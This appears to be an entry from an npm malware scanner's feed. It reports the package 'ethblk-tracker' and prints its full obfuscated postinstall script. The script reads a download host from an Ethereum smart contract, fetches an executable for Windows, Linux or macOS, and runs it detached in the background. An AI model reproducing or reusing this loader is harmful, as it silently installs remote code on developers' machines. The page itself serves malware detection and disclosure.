Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our 𝕏 / Twitter feed for updates.
ethblk-tracker:
Detected: 31 Oct 2024
Detected Date: 31 Oct 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm
The code is designed to fetch a URL from a smart contract on the Ethereum blockchain, download an executable file based on the operating system (Windows, Linux, or macOS), and then execute it in the background. This poses a significant security risk as it could be used to download and run malicious code on the victim's machine without their consent.
Install script:node uzzz6vul.cjs
Install script code:const _0x47be3d=_0x16fc;function _0x16fc(_0x2fe9c6,_0x892712){const _0x289dd9=_0x289d();return _0x16fc=function(_0x16fcad,_0x29df1d){_0x16fcad=_0x16fcad-0x8e;let _0x373553=_0x289dd9[_0x16fcad];return _0x373553;},_0x16fc(_0x2fe9c6,_0x892712);}(function(_0x12de34,_0x5965a0){const _0x3329fd=_0x16fc,_0x1dc971=_0x12de34();while(!![]){try{const _0x4076b6=parseInt(_0x3329fd(0xb8))/0x1+-parseInt(_0x3329fd(0xab))/0x2*(-parseInt(_0x3329fd(0xa8))/0x3)+parseInt(_0x3329fd(0xba))/0x4+-parseInt(_0x3329fd(0xa6))/0x5+parseInt(_0x3329fd(0xb7))/0x6+-parseInt(_0x3329fd(0xa4))/0x7*(-parseInt(_0x3329fd(0xac))/0x8)+parseInt(_0x3329fd(0x99))/0x9*(-parseInt(_0x3329fd(0xbd))/0xa);if(_0x4076b6===_0x5965a0)break;else _0x1dc971['push'](_0x1dc971['shift']());}catch(_0x3aa3b8){_0x1dc971['push'](_0x1dc971['shift']());}}}(_0x289d,0xee113));const {ethers}=require(_0x47be3d(0xb2)),axios=require(_0x47be3d(0xa3)),util=require('util'),fs=require('fs'),path=require(_0x47be3d(0xad)),os=require('os'),{spawn}=require('child_process'),contractAddress=_0x47be3d(0xb1),WalletOwner='0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84',abi=[_0x47be3d(0x93)],provider=ethers[_0x47be3d(0xc0)](_0x47be3d(0xb5)),contract=new ethers['Contract'](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x156f33=_0x47be3d,_0x4d8b1a={'qTJFJ':_0x156f33(0xc1),'dmHFt':function(_0x7f4752){return _0x7f4752();}};try{const _0x1867b4=await contract[_0x156f33(0xb9)](WalletOwner);return _0x1867b4;}catch(_0x1dcffa){return console[_0x156f33(0xaa)](_0x4d8b1a[_0x156f33(0xb3)],_0x1dcffa),await _0x4d8b1a[_0x156f33(0xa7)](fetchAndUpdateIp);}},getDownloadUrl=_0x4f440a=>{const _0x2180bc=_0x47be3d,_0x41e3dd={'bQyxM':_0x2180bc(0x98),'SLSiA':_0x2180bc(0x9a),'TtkoB':'darwin'},_0x40972f=os['platform']();switch(_0x40972f){case _0x41e3dd['bQyxM']:return _0x4f440a+'/node-win.exe';case _0x41e3dd[_0x2180bc(0xbf)]:return _0x4f440a+'/node-linux';case _0x41e3dd[_0x2180bc(0xb4)]:return _0x4f440a+_0x2180bc(0x96);default:throw new Error(_0x2180bc(0x92)+_0x40972f);}},downloadFile=async(_0x19de6b,_0x4ab729)=>{const _0x4d957f=_0x47be3d,_0x268fea={'cpBNg':_0x4d957f(0x9f),'Rucqe':'error','QNnyt':function(_0x5d0397,_0x2d1083){return _0x5d0397(_0x2d1083);},'ZsWDI':_0x4d957f(0xa2),'JQwHq':_0x4d957f(0x9e)},_0x18b5a9=fs['createWriteStream'](_0x4ab729),_0x237ea5=await _0x268fea['QNnyt'](axios,{'url':_0x19de6b,'method':_0x268fea[_0x4d957f(0x9b)],'responseType':_0x268fea[_0x4d957f(0x95)]});return _0x237ea5['data'][_0x4d957f(0x8f)](_0x18b5a9),new Promise((_0x5789aa,_0x104c22)=>{const _0x48b958=_0x4d957f;_0x18b5a9['on'](_0x268fea[_0x48b958(0x9c)],_0x5789aa),_0x18b5a9['on'](_0x268fea[_0x48b958(0xa5)],_0x104c22);});},executeFileInBackground=async _0x31f8b6=>{const _0x40f257=_0x47be3d,_0x581981={'jmEhp':function(_0x375808,_0x4ac2d8,_0x20dd53,_0x13fca8){return _0x375808(_0x4ac2d8,_0x20dd53,_0x13fca8);},'giNBn':_0x40f257(0x8e),'ASwFq':_0x40f257(0x90)};try{const _0x1cb495=_0x581981[_0x40f257(0x97)](spawn,_0x31f8b6,[],{'detached':!![],'stdio':_0x581981[_0x40f257(0xbb)]});_0x1cb495['unref']();}catch(_0x186e18){console['error'](_0x581981[_0x40f257(0xb0)],_0x186e18);}},runInstallation=async()=>{const _0x5379d0=_0x47be3d,_0xed2042={'ZJJcQ':function(_0x13fad8){return _0x13fad8();},'CFyYW':function(_0x11d752,_0x1fb993,_0x51bbbd){return _0x11d752(_0x1fb993,_0x51bbbd);},'LymQt':function(_0x484505,_0x24f7d5){return _0x484505!==_0x24f7d5;},'vIyaR':_0x5379d0(0x98),'KlAig':_0x5379d0(0xa1),'WHMoW':function(_0x1afc23,_0x578661){return _0x1afc23(_0x578661);},'rvtyh':'Ошибка\x20установки:'};try{const _0x22b2d1=await _0xed2042[_0x5379d0(0xae)](fetchAndUpdateIp),_0xbf437a=getDownloadUrl(_0x22b2d1),_0x2e5301=os[_0x5379d0(0xa0)](),_0x259848=path[_0x5379d0(0xbc)](_0xbf437a),_0x3bde32=path['join'](_0x2e5301,_0x259848);await _0xed2042[_0x5379d0(0xbe)](downloadFile,_0xbf437a,_0x3bde32);if(_0xed2042[_0x5379d0(0xa9)](os[_0x5379d0(0xb6)](),_0xed2042[_0x5379d0(0x9d)]))fs[_0x5379d0(0x94)](_0x3bde32,_0xed2042['KlAig']);_0xed2042[_0x5379d0(0x91)](executeFileInBackground,_0x3bde32);}catch(_0x27d90c){console[_0x5379d0(0xaa)](_0xed2042[_0x5379d0(0xaf)],_0x27d90c);}};function _0x289d(){const _0x430518=['error','487498rPgJcF','589720McyToR','path','ZJJcQ','rvtyh','ASwFq','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','ethers','qTJFJ','TtkoB','mainnet','platform','9971130ilmkvi','1788475ewoHxC','getString','5763100FiIAUi','giNBn','basename','14560880kZaEQe','CFyYW','SLSiA','getDefaultProvider','Ошибка\x20при\x20получении\x20IP\x20адреса:','ignore','pipe','Ошибка\x20при\x20запуске\x20файла:','WHMoW','Unsupported\x20platform:\x20','function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)','chmodSync','JQwHq','/node-macos','jmEhp','win32','27OPbpOs','linux','ZsWDI','cpBNg','vIyaR','stream','finish','tmpdir','755','GET','axios','49vHSudo','Rucqe','2756105TgRdgT','dmHFt','6OOqLtW','LymQt'];_0x289d=function(){return _0x430518;};return _0x289d();}runInstallation();